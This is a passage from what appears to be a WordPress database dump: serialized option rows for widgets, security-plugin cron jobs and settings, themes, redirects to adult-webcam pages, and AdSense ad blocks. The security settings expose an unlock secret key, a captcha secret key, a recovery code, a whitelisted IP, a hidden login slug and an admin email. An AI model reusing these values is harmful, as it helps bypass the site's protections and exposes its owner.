2\";i:3;s:6:\"text-3\";i:4;s:6:\"text-6\";}s:8:\"magazine\";a:0:{}s:14:\"sidebar-header\";a:0:{}s:11:\"footer-left\";N;s:10:\"footer-mid\";N;s:12:\"footer-right\";N;s:13:\"array_version\";i:3;}','yes'),(100,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(101,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(102,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(103,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(104,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(105,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(106,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(107,'cron','a:26:{i:1675209433;a:1:{s:18:\"cerber_bg_launcher\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:8:\"crb_five\";s:4:\"args\";a:0:{}s:8:\"interval\";i:300;}}}i:1675209600;a:1:{s:15:\"cerber_hourly_1\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675210200;a:1:{s:15:\"cerber_hourly_2\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675210250;a:1:{s:21:\"wordfence_ls_ntp_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675210256;a:1:{s:21:\"wordfence_hourly_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675211916;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675212314;a:1:{s:24:\"aiowps_hourly_cron_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1675218000;a:1:{s:12:\"cerber_daily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675221036;a:1:{s:21:\"wp_update_user_counts\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1675237888;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1675237932;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675238017;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675240708;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1675240715;a:1:{s:18:\"wp_https_detection\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1675242636;a:1:{s:23:\"aiowps_daily_cron_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675242685;a:1:{s:24:\"akismet_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675246256;a:1:{s:20:\"wordfence_daily_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675246319;a:1:{s:22:\"redirection_log_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675246343;a:3:{s:16:\"wpseo_ryte_fetch\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}s:13:\"wpseo-reindex\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:31:\"wpseo_permalink_structure_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675251765;a:1:{s:21:\"ai1wm_storage_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675260656;a:1:{s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675273478;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1675307400;a:1:{s:30:\"wordfence_start_scheduled_scan\";a:1:{s:32:\"4a82351469543b3805c2a59344aaa42d\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:1:{i:0;i:1675307400;}}}}i:1675566600;a:1:{s:30:\"wordfence_start_scheduled_scan\";a:1:{s:32:\"ec06e0f929b215747c38d10b80ecff13\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:1:{i:0;i:1675566600;}}}}i:1675699200;a:1:{s:31:\"wordfence_email_activity_report\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:0:{}}}}s:7:\"version\";i:2;}','yes'),(108,'theme_mods_twentyseventeen','a:2:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1503388794;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}}}}','yes'),(123,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:32:\"amber.platts@vanillacircus.co.uk\";s:7:\"version\";s:5:\"6.1.1\";s:9:\"timestamp\";i:1668542051;}','no'),(140,'recently_activated','a:0:{}','yes'),(142,'html_import','a:44:{s:14:\"root_directory\";s:39:\"/var/www/dailyjolly.co.uk/html/articles\";s:7:\"old_url\";s:0:\"\";s:10:\"index_file\";s:10:\"index.html\";s:15:\"file_extensions\";s:14:\"html,htm,shtml\";s:8:\"skipdirs\";s:25:\"images,includes,Templates\";s:14:\"import_content\";s:4:\"file\";s:11:\"content_tag\";s:3:\"div\";s:14:\"content_tagatt\";s:2:\"id\";s:14:\"content_attval\";s:7:\"content\";s:14:\"content_region\";s:0:\"\";s:14:\"document_mimes\";s:84:\"rtf,doc,docx,xls,xlsx,csv,ppt,pps,pptx,ppsx,pdf,zip,wmv,avi,flv,mov,mpeg,mp3,m4a,wav\";s:9:\"meta_desc\";i:1;s:6:\"encode\";i:1;s:10:\"allow_tags\";s:99:\"<p><br><img><a><ul><ol><li><dl><dt><dd><blockquote><cite><em><i><strong><b><h2><h3><h4><h5><h6><hr>\";s:16:\"allow_attributes\";s:18:\"href,alt,title,src\";s:12:\"import_title\";s:3:\"tag\";s:9:\"title_tag\";s:5:\"title\";s:12:\"title_tagatt\";s:0:\"\";s:12:\"title_attval\";s:0:\"\";s:12:\"title_region\";s:0:\"\";s:17:\"remove_from_title\";s:0:\"\";s:12:\"title_inside\";i:1;s:4:\"type\";s:4:\"post\";s:6:\"status\";s:7:\"publish\";s:9:\"timestamp\";s:9:\"filemtime\";s:4:\"user\";i:1;s:11:\"root_parent\";s:0:\"\";s:13:\"page_template\";s:1:\"0\";s:8:\"date_tag\";s:3:\"div\";s:11:\"date_tagatt\";s:2:\"id\";s:11:\"date_attval\";s:4:\"date\";s:11:\"date_region\";s:0:\"\";s:16:\"customfield_name\";a:1:{i:0;s:0:\"\";}s:15:\"customfield_tag\";a:1:{i:0;s:3:\"div\";}s:18:\"customfield_tagatt\";a:1:{i:0;s:5:\"class\";}s:18:\"customfield_attval\";a:1:{i:0;s:10:\"fieldclass\";}s:18:\"customfield_region\";a:1:{i:0;s:0:\"\";}s:8:\"post_tag\";s:0:\"\";s:11:\"post_format\";s:0:\"\";s:11:\"index_files\";s:0:\"\";s:12:\"import_field\";a:1:{i:0;N;}s:16:\"customfield_html\";a:1:{i:0;N;}s:10:\"clean_html\";i:0;s:8:\"firstrun\";b:0;}','no'),(143,'wph_environment_hash','e10a80029062f4b93b3c1981cc6092e0','yes'),(144,'wph_settings','a:4:{s:15:\"module_settings\";a:0:{}s:13:\"recovery_code\";s:32:\"dba90bc28ccd782161323e717f1468d7\";s:7:\"version\";s:7:\"1.4.5.1\";s:18:\"write_check_string\";s:16:\"1503388372_83162\";}','yes'),(147,'widget_ai_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(148,'widget_akismet_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(149,'vc_version','5.1.1','yes'),(150,'wpb_js_composer_license_activation_notified','yes','yes'),(155,'WPLANG','','yes'),(160,'301_redirects','a:5:{s:29:\"/personal-services/index.html\";s:55:\"http://www.dailyjolly.co.uk/personal-servicesindex-html\";s:35:\"/adult-web-cams/mature-web-cams.htm\";s:61:\"http://www.dailyjolly.co.uk/adult-web-camslesbian-webcams-htm\";s:21:\"/mature-phone-sex.htm\";s:48:\"http://www.dailyjolly.co.uk/mature-phone-sex-htm\";s:35:\"/adult-web-cams/lesbian-webcams.htm\";s:61:\"http://www.dailyjolly.co.uk/adult-web-camsmature-web-cams-htm\";s:11:\"/index.html\";s:38:\"http://www.dailyjolly.co.uk/index-html\";}','yes'),(165,'aiowpsec_db_version','1.9','yes'),(166,'aio_wp_security_configs','a:94:{s:19:\"aiowps_enable_debug\";s:0:\"\";s:36:\"aiowps_remove_wp_generator_meta_info\";s:0:\"\";s:25:\"aiowps_prevent_hotlinking\";s:0:\"\";s:28:\"aiowps_enable_login_lockdown\";s:1:\"1\";s:28:\"aiowps_allow_unlock_requests\";s:0:\"\";s:25:\"aiowps_max_login_attempts\";i:3;s:24:\"aiowps_retry_time_period\";i:1;s:26:\"aiowps_lockout_time_length\";i:600000000;s:28:\"aiowps_set_generic_login_msg\";s:0:\"\";s:26:\"aiowps_enable_email_notify\";s:0:\"\";s:20:\"aiowps_email_address\";s:32:\"amber.platts@vanillacircus.co.uk\";s:27:\"aiowps_enable_forced_logout\";s:0:\"\";s:25:\"aiowps_logout_time_period\";s:2:\"60\";s:39:\"aiowps_enable_invalid_username_lockdown\";s:1:\"1\";s:43:\"aiowps_instantly_lockout_specific_usernames\";a:0:{}s:32:\"aiowps_unlock_request_secret_key\";s:20:\"xjjq5mwqn83szbzzvxjb\";s:35:\"aiowps_lockdown_enable_whitelisting\";s:0:\"\";s:36:\"aiowps_lockdown_allowed_ip_addresses\";s:0:\"\";s:26:\"aiowps_enable_whitelisting\";s:1:\"1\";s:27:\"aiowps_allowed_ip_addresses\";s:14:\"217.206.184.92\";s:27:\"aiowps_enable_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_custom_login_captcha\";s:0:\"\";s:25:\"aiowps_captcha_secret_key\";s:20:\"ly4eygg2w2qmig2jcogv\";s:42:\"aiowps_enable_manual_registration_approval\";s:1:\"1\";s:39:\"aiowps_enable_registration_page_captcha\";s:1:\"1\";s:35:\"aiowps_enable_registration_honeypot\";s:1:\"1\";s:27:\"aiowps_enable_random_prefix\";s:0:\"\";s:31:\"aiowps_enable_automated_backups\";s:0:\"\";s:26:\"aiowps_db_backup_frequency\";s:1:\"4\";s:25:\"aiowps_db_backup_interval\";s:1:\"2\";s:26:\"aiowps_backup_files_stored\";s:1:\"2\";s:32:\"aiowps_send_backup_email_address\";s:0:\"\";s:27:\"aiowps_backup_email_address\";s:32:\"amber.platts@vanillacircus.co.uk\";s:27:\"aiowps_disable_file_editing\";s:1:\"1\";s:37:\"aiowps_prevent_default_wp_file_access\";s:1:\"1\";s:22:\"aiowps_system_log_file\";s:9:\"error_log\";s:26:\"aiowps_enable_blacklisting\";s:0:\"\";s:26:\"aiowps_banned_ip_addresses\";s:0:\"\";s:28:\"aiowps_enable_basic_firewall\";s:1:\"1\";s:31:\"aiowps_enable_pingback_firewall\";s:0:\"\";s:38:\"aiowps_disable_xmlrpc_pingback_methods\";s:0:\"\";s:34:\"aiowps_block_debug_log_file_access\";s:1:\"1\";s:26:\"aiowps_disable_index_views\";s:0:\"\";s:30:\"aiowps_disable_trace_and_track\";s:0:\"\";s:28:\"aiowps_forbid_proxy_comments\";s:0:\"\";s:29:\"aiowps_deny_bad_query_strings\";s:0:\"\";s:34:\"aiowps_advanced_char_string_filter\";s:0:\"\";s:25:\"aiowps_enable_5g_firewall\";s:0:\"\";s:25:\"aiowps_enable_6g_firewall\";s:0:\"\";s:26:\"aiowps_enable_custom_rules\";s:0:\"\";s:19:\"aiowps_custom_rules\";s:0:\"\";s:25:\"aiowps_enable_404_logging\";s:0:\"\";s:28:\"aiowps_enable_404_IP_lockout\";s:0:\"\";s:30:\"aiowps_404_lockout_time_length\";s:2:\"60\";s:28:\"aiowps_404_lock_redirect_url\";s:16:\"http://127.0.0.1\";s:31:\"aiowps_enable_rename_login_page\";s:1:\"1\";s:28:\"aiowps_enable_login_honeypot\";s:0:\"\";s:43:\"aiowps_enable_brute_force_attack_prevention\";s:0:\"\";s:30:\"aiowps_brute_force_secret_word\";s:0:\"\";s:24:\"aiowps_cookie_brute_test\";s:0:\"\";s:44:\"aiowps_cookie_based_brute_force_redirect_url\";s:16:\"http://127.0.0.1\";s:59:\"aiowps_brute_force_attack_prevention_pw_protected_exception\";s:0:\"\";s:51:\"aiowps_brute_force_attack_prevention_ajax_exception\";s:0:\"\";s:19:\"aiowps_site_lockout\";s:0:\"\";s:23:\"aiowps_site_lockout_msg\";s:0:\"\";s:30:\"aiowps_enable_spambot_blocking\";s:1:\"1\";s:29:\"aiowps_enable_comment_captcha\";s:1:\"1\";s:31:\"aiowps_enable_autoblock_spam_ip\";s:0:\"\";s:33:\"aiowps_spam_ip_min_comments_block\";s:0:\"\";s:32:\"aiowps_enable_automated_fcd_scan\";s:0:\"\";s:25:\"aiowps_fcd_scan_frequency\";s:1:\"4\";s:24:\"aiowps_fcd_scan_interval\";s:1:\"2\";s:28:\"aiowps_fcd_exclude_filetypes\";s:0:\"\";s:24:\"aiowps_fcd_exclude_files\";s:0:\"\";s:26:\"aiowps_send_fcd_scan_email\";s:0:\"\";s:29:\"aiowps_fcd_scan_email_address\";s:32:\"amber.platts@vanillacircus.co.uk\";s:27:\"aiowps_fcds_change_detected\";b:0;s:22:\"aiowps_copy_protection\";s:0:\"\";s:40:\"aiowps_prevent_site_display_inside_frame\";s:0:\"\";s:32:\"aiowps_prevent_users_enumeration\";s:0:\"\";s:28:\"aiowps_block_fake_googlebots\";s:1:\"1\";s:31:\"aiowps_enable_woo_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_woo_register_captcha\";s:0:\"\";s:38:\"aiowps_enable_woo_lostpassword_captcha\";s:0:\"\";s:27:\"aiowps_max_file_upload_size\";i:10;s:32:\"aiowps_place_custom_rules_at_top\";s:0:\"\";s:33:\"aiowps_enable_bp_register_captcha\";s:0:\"\";s:35:\"aiowps_enable_bbp_new_topic_captcha\";s:0:\"\";s:42:\"aiowps_disallow_unauthorized_rest_requests\";s:0:\"\";s:25:\"aiowps_recaptcha_site_key\";s:0:\"\";s:27:\"aiowps_recaptcha_secret_key\";s:0:\"\";s:24:\"aiowps_default_recaptcha\";s:0:\"\";s:12:\"installed-at\";i:1649844807;s:22:\"aiowps_login_page_slug\";s:11:\"213sdfsdf34\";}','yes'),(174,'current_theme','HitMag','yes'),(175,'theme_mods_writee','a:3:{i:0;b:0;s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1508228794;s:4:\"data\";a:5:{s:19:\"wp_inactive_widgets\";a:0:{}s:15:\"primary-sidebar\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:8:\"footer-1\";a:0:{}s:8:\"footer-2\";a:0:{}s:8:\"footer-3\";N;}}}','yes'),(176,'theme_switched','','yes'),(177,'widget_wrt_recent_posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(178,'widget_wrt_social','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(179,'widget_wrt_about','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(3372,'theme_mods_kale','a:3:{i:0;b:0;s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1508229016;s:4:\"data\";a:11:{s:19:\"wp_inactive_widgets\";a:0:{}s:15:\"sidebar-default\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:24:\"sidebar-default-bordered\";a:0:{}s:17:\"header-row-1-left\";a:0:{}s:18:\"header-row-1-right\";N;s:18:\"footer-row-2-col-1\";N;s:18:\"footer-row-2-col-2\";N;s:18:\"footer-row-2-col-3\";N;s:18:\"footer-row-2-col-4\";N;s:18:\"footer-row-2-col-5\";N;s:19:\"footer-row-3-center\";N;}}}','yes'),(3378,'theme_mods_hitmag','a:3:{i:0;b:0;s:18:\"custom_css_post_id\";i:-1;s:18:\"nav_menu_locations\";a:1:{s:6:\"menu-1\";i:2;}}','yes'),(3379,'widget_hitmag_single_category_posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(3380,'widget_hitmag_dual_category_posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(3381,'widget_hitmag_grid_category_posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(3382,'widget_sidebar_posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(3383,'widget_hitmag_tabbed_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(3443,'quick-featured-images-settings','a:3:{s:17:\"column_thumb_post\";s:1:\"1\";s:17:\"column_thumb_page\";s:1:\"1\";s:22:\"minimum_role_all_pages\";s:6:\"editor\";}','yes'),(3448,'quick-featured-images-defaults','a:0:{}','yes'),(3462,'nav_menu_options','a:1:{s:8:\"auto_add\";a:0:{}}','yes'),(4472,'akismet_spam_count','45','yes'),(4693,'wpmdr_from_','a:2:{s:4:\"home\";s:1:\"1\";s:11:\"help_notice\";s:1:\"1\";}','yes'),(4694,'wpmdr_css','.entry-meta {display:none !important;}.home .entry-meta { display: none; }.entry-footer {display:none !important;}.home .entry-footer { display: none; }','yes'),(4695,'wpmdr_disable_php','0','yes'),(4696,'wpmdr_disable_css','0','yes'),(6212,'ai-install','1509641333','yes'),(6213,'ad_inserter','a:21:{i:1;a:78:{s:4:\"code\";s:327:\"<script async src=\"//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js\"></script>\r\n<ins class=\"adsbygoogle\"\r\n     style=\"display:block\"\r\n     data-ad-client=\"ca-pub-2121528995419082\"\r\n     data-ad-slot=\"8029362605\"\r\n     data-ad-format=\"auto\"></ins>\r\n<script>\r\n(adsbygoogle = window.adsbygoogle || []).push({});\r\n</script>\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_amp\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:7:\"Block 1\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";s:1:\"1\";s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:15:\"min_words_above\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";i:0;s:15:\"inverted_filter\";s:1:\"0\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:0:\"\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:16:\"adb-block-action\";i:0;s:21:\"adb-block-replacement\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:13:\"taxonomy_list\";s:0:\"\";s:18:\"taxonomy_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"1\";s:19:\"display_on_homepage\";s:1:\"1\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";i:0;s:22:\"enabled_on_which_posts\";i:0;s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:2;a:78:{s:4:\"code\";s:327:\"<script async src=\"//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js\"></script>\r\n<ins class=\"adsbygoogle\"\r\n     style=\"display:block\"\r\n     data-ad-client=\"ca-pub-2121528995419082\"\r\n     data-ad-slot=\"8029362605\"\r\n     data-ad-format=\"auto\"></ins>\r\n<script>\r\n(adsbygoogle = window.adsbygoogle || []).push({});\r\n</script>\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_amp\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:7:\"Block 2\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";s:1:\"6\";s:16:\"paragraph_number\";s:1:\"3\";s:14:\"min_paragraphs\";s:0:\"\";s:15:\"min_words_above\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";i:0;s:15:\"inverted_filter\";s:1:\"0\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:0:\"\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:16:\"adb-block-action\";i:0;s:21:\"adb-block-replacement\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:13:\"taxonomy_list\";s:0:\"\";s:18:\"taxonomy_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"1\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";i:0;s:22:\"enabled_on_which_posts\";i:0;s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:3;a:78:{s:4:\"code\";s:327:\"<script async src=\"//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js\"></script>\r\n<ins class=\"adsbygoogle\"\r\n     style=\"display:block\"\r\n     data-ad-client=\"ca-pub-2121528995419082\"\r\n     data-ad-slot=\"8029362605\"\r\n     data-ad-format=\"auto\"></ins>\r\n<script>\r\n(adsbygoogle = window.adsbygoogle || 